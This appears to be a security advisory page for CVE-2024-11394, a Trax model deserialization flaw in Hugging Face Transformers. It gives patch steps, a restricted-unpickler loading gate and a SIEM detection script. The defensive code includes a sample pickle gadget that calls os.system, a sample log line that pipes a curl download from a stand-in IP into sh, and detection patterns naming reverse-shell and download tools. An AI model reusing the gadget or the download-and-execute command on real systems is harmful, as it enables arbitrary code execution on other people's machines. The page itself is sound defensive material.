CVE-2024-11394

8.8 HIGH

📋 TL;DR

Hugging Face Transformers deserializes Trax model files without validating their contents. An attacker who gets a user to load a crafted Trax model file executes arbitrary code with that user's privileges. The "remote" part is the delivery of the file; the victim still has to load it. Users of Hugging Face Transformers with Trax model support are affected.

💻 Affected Systems

Products:
  • Hugging Face Transformers
Versions: All releases with Trax model support prior to the patched release (see the vendor advisory for the exact version)
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires user interaction (the victim must load the malicious model file) and the Trax model code path; Trax model support must be enabled.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Code execution with the privileges of the user running the vulnerable application. If that is a service account or root on a training or inference host, this is full host compromise, followed by theft of data, models and credentials, ransomware deployment, or lateral movement.

🟠 Likely Case: Arbitrary code execution as the user who loads an untrusted Trax model file from a malicious source (a developer workstation or a CI/training job). This is not a privilege escalation by itself; the attacker gets exactly the loading user's rights.

🟢 If Mitigated: No impact if model files are accepted only from trusted, integrity-checked sources, or if loading runs in a sandbox with minimal privileges and no credentials worth stealing.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: No
Weaponized: LIKELY
Unauthenticated Exploit: No
Complexity: LOW

User interaction is required: the victim must load the attacker's model file. Once the file is crafted, exploitation is straightforward and needs no further interaction.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check Hugging Face security advisory for specific version

Vendor Advisory: https://huggingface.co/docs/transformers/security

Restart Required: No system restart, but running Python processes keep the old package loaded and must be restarted to pick up the upgrade.

Instructions:

1. Check the installed version: python -c "import transformers; print(transformers.__version__)"
2. Upgrade via pip: pip install --upgrade transformers (and pin the patched version in your requirements or lock file so it is not silently downgraded)
3. Confirm the new version is in use in every environment that loads models (virtualenvs, containers, base images) and restart Python processes

🔧 Temporary Workarounds

Disable Trax model support (all platforms)

Trax model files are the input to this deserialization issue. Configure the application to reject Trax model files, or remove the Trax integration entirely if it is not needed.

Restrict model file sources (all platforms)

Only load model files from trusted, verified sources. Implement an allowlist of trusted model repositories (for example an internal mirror you control) and pin the digests of the files you have reviewed.

🧯 If You Can't Patch

  • Validate model files before they reach the loader: expected format, known source, pinned digest
  • Run transformers in a sandboxed/isolated environment (container or VM) with minimal privileges and no access to production credentials
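The two workarounds and the first fallback above can be combined into one gate in front of the loader. The following is an added example written for this page, not Hugging Face or Trax code. It assumes the checkpoint is a Python pickle, optionally gzip-compressed (the page does not name the format); the allowed directory, the pinned digest and the ALLOWED_GLOBALS set are illustrative values to replace with your own:

```python
"""Guarded loading of a Trax-style pickled checkpoint.

Added example for this advisory page, not Hugging Face / Trax code. It assumes
the checkpoint is a Python pickle, optionally gzip-compressed; the allowlists
and paths below are illustrative.
"""
import gzip
import hashlib
import os
import pickle
import tempfile
from pathlib import Path


class UnsafeCheckpoint(Exception):
    """Raised when a model file fails a gate, before any of it is executed."""


# Workaround "restrict model file sources": only these directories may supply
# checkpoints. ASSUMPTION: in production this is a mirror/registry you control.
def check_source(path: Path, allowed_roots: list[Path]) -> Path:
    real = path.resolve()  # collapses ../ and symlinks before the check
    for root in allowed_roots:
        if real.is_relative_to(root.resolve()):
            return real
    raise UnsafeCheckpoint(f"{path} is outside the allowed model roots")


# Input validation, step 1: pin the exact bytes you reviewed.
def check_digest(path: Path, expected_sha256: str) -> None:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    if h.hexdigest() != expected_sha256:
        raise UnsafeCheckpoint(f"{path.name}: sha256 mismatch")


# Input validation, step 2: the pickle may only reference these importables.
# Weight dicts need containers; os.system, builtins.eval etc. are refused.
# ASSUMPTION: real checkpoints also need numpy/jax array reconstructors here.
ALLOWED_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "set"), ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is consulted for every GLOBAL/STACK_GLOBAL opcode before a
    REDUCE opcode can call anything, so a refusal here stops the payload."""

    def find_class(self, module: str, name: str):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise UnsafeCheckpoint(f"pickle references {module}.{name}")

    def persistent_load(self, pid):
        raise UnsafeCheckpoint("persistent ids are not allowed")


def load_checkpoint(path: Path, allowed_roots: list[Path], expected_sha256: str):
    real = check_source(path, allowed_roots)
    check_digest(real, expected_sha256)
    opener = gzip.open if real.suffix == ".gz" else open
    with opener(real, "rb") as f:
        return RestrictedUnpickler(f).load()


class _Gadget:
    """Constructed sample: unpickling this with plain pickle.load would run
    os.system. It is only ever fed to RestrictedUnpickler below."""

    def __reduce__(self):
        return (os.system, ("echo this would have executed",))


def demo() -> tuple[dict, str]:
    """Write one benign and one hostile checkpoint (constructed) into a temp
    root and run both through the gate. Returns (benign weights, refusal)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        benign = root / "model.pkl.gz"
        with gzip.open(benign, "wb") as f:
            pickle.dump({"layer0/w": [0.1, 0.2], "layer0/b": [0.0]}, f)
        hostile = root / "trojan.pkl"
        hostile.write_bytes(pickle.dumps(_Gadget()))  # dumps() executes nothing

        def digest(p: Path) -> str:
            return hashlib.sha256(p.read_bytes()).hexdigest()

        weights = load_checkpoint(benign, [root], digest(benign))
        try:
            load_checkpoint(hostile, [root], digest(hostile))
            refusal = ""
        except UnsafeCheckpoint as e:
            refusal = str(e)
        return weights, refusal


if __name__ == "__main__":
    w, why = demo()
    print("loaded:", w)
    print("refused:", why)
```

Running the module loads the benign checkpoint and refuses the hostile one before the embedded callable is ever invoked, because the Unpickler asks find_class for each import the pickle requests before a REDUCE opcode can call it. Extend ALLOWED_GLOBALS only with the exact reconstructors your real checkpoints need; every addition is new attack surface, and a digest mismatch or a path outside the allowed root is refused before the file is even opened for unpickling.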

🔍 How to Verify

Check if Vulnerable:

Compare the installed transformers version against the patched release named in the vendor advisory; any earlier version with Trax model support is vulnerable.

Check Version:

python -c "import transformers; print(transformers.__version__)"

Verify Fix Applied:

Confirm the installed version is at or above the patched release in every environment that loads models, and test that a known-good Trax model still loads.

📡 Detection & Monitoring

Log Indicators:

  • Unexpected child processes (shells, download tools) spawned by a Python process that is loading models
  • Errors or warnings during model loading/deserialization, especially on files that then trigger other activity
  • Model files fetched from hosts outside your approved model registries

Network Indicators:

  • Downloads of model files from unusual/untrusted sources
  • Outbound connections following model file loading

SIEM Query:

Process creation where the parent image is a Python interpreter, the parent command line references transformers or Trax model loading, and the child is a shell or download tool (sh, bash, cmd.exe, powershell, curl, wget, nc), or the child command line pipes a download into a shell
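The query above as executable logic over constructed process-creation events. This is an added example for this page, not a vendor rule: the field names ts/host/parent_image/parent_cmdline/image/cmdline are an assumed normalized schema, the events are made up, and the IP address is from the TEST-NET-2 documentation range:

```python
"""Detection rule for a model-loading Python process spawning a shell or
download tool, run over constructed process-creation events.

Added example for this advisory page; the schema and events are assumptions.
"""
import json
import re
from pathlib import PurePosixPath, PureWindowsPath
from typing import Optional

# Parent must be a Python interpreter (python, python3.11, python.exe ...).
PYTHON_IMAGE = re.compile(r"^python(\d+(\.\d+)*)?(\.exe)?$", re.I)
# Parent command line suggests model loading (raises severity when present).
MODEL_CONTEXT = re.compile(
    r"transformers|trax|from_pretrained|\.pkl\b|\.pkl\.gz|checkpoint", re.I)
# Children a model loader has no business spawning.
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe",
    "curl", "wget", "nc", "ncat", "socat", "certutil.exe", "bitsadmin.exe",
    "mshta.exe",
}
# Download-and-execute or reverse-shell shapes in the child command line.
DOWNLOAD_AND_RUN = re.compile(
    r"(curl|wget)[^|;&]*[|;&]\s*(ba|z|da)?sh\b|/dev/tcp/|-e\s*/bin/\S*sh"
    r"|IEX\s*\(|DownloadString", re.I)


def basename(image: str) -> str:
    """Last path component for either path flavour (mixed fleets are common)."""
    return (PureWindowsPath(image).name if "\\" in image
            else PurePosixPath(image).name)


def evaluate(event: dict) -> Optional[dict]:
    """Return a finding for one event, or None when the rule does not fire."""
    if not PYTHON_IMAGE.match(basename(event["parent_image"])):
        return None
    child = basename(event["image"]).lower()
    cmd = event.get("cmdline", "")
    bad_child = child in SUSPICIOUS_CHILDREN
    bad_cmd = bool(DOWNLOAD_AND_RUN.search(cmd))
    if not (bad_child or bad_cmd):
        return None
    in_model_ctx = bool(MODEL_CONTEXT.search(event.get("parent_cmdline", "")))
    return {
        "ts": event["ts"],
        "host": event["host"],
        "severity": "high" if in_model_ctx else "medium",
        "reason": f"python parent spawned {child!r}"
                  + (" during model loading" if in_model_ctx else ""),
    }


def run(lines: list) -> list:
    """Evaluate newline-delimited JSON events; malformed lines are skipped."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = evaluate(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_LOG = [
    json.dumps({"ts": "2024-12-02T10:15:01Z", "host": "ml-worker-03",
                "parent_image": "/usr/bin/python3.11",
                "parent_cmdline": "python3 convert.py --trax_checkpoint ./downloads/model.pkl.gz",
                "image": "/bin/sh",
                "cmdline": "sh -c \"curl -s http://198.51.100.7/x | sh\""}),
    json.dumps({"ts": "2024-12-02T10:15:09Z", "host": "ml-worker-03",
                "parent_image": "/usr/bin/python3.11",
                "parent_cmdline": "python3 train.py",
                "image": "/usr/bin/nvidia-smi",
                "cmdline": "nvidia-smi --query-gpu=memory.used --format=csv"}),
    json.dumps({"ts": "2024-12-02T10:16:30Z", "host": "build-01",
                "parent_image": "/bin/bash", "parent_cmdline": "bash",
                "image": "/usr/bin/curl",
                "cmdline": "curl -O https://example.org/data.tar"}),
    json.dumps({"ts": "2024-12-02T10:17:02Z", "host": "WS-DEV-7",
                "parent_image": "C:\\Python311\\python.exe",
                "parent_cmdline": "python.exe app.py",
                "image": "C:\\Windows\\System32\\cmd.exe",
                "cmdline": "cmd.exe /c whoami"}),
    "this line is not json",
]

if __name__ == "__main__":
    for finding in run(SAMPLE_LOG):
        print(finding)
```

Only the first and fourth events fire: the shell spawned by a Python process whose command line names a .pkl.gz checkpoint is rated high, the cmd.exe child of an unrelated Python process medium, and the GPU query, the bash-launched curl and the malformed line are ignored. Tune SUSPICIOUS_CHILDREN to your fleet (notebook kernels and build tools legitimately spawn shells) rather than widening MODEL_CONTEXT, which is only a severity hint.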
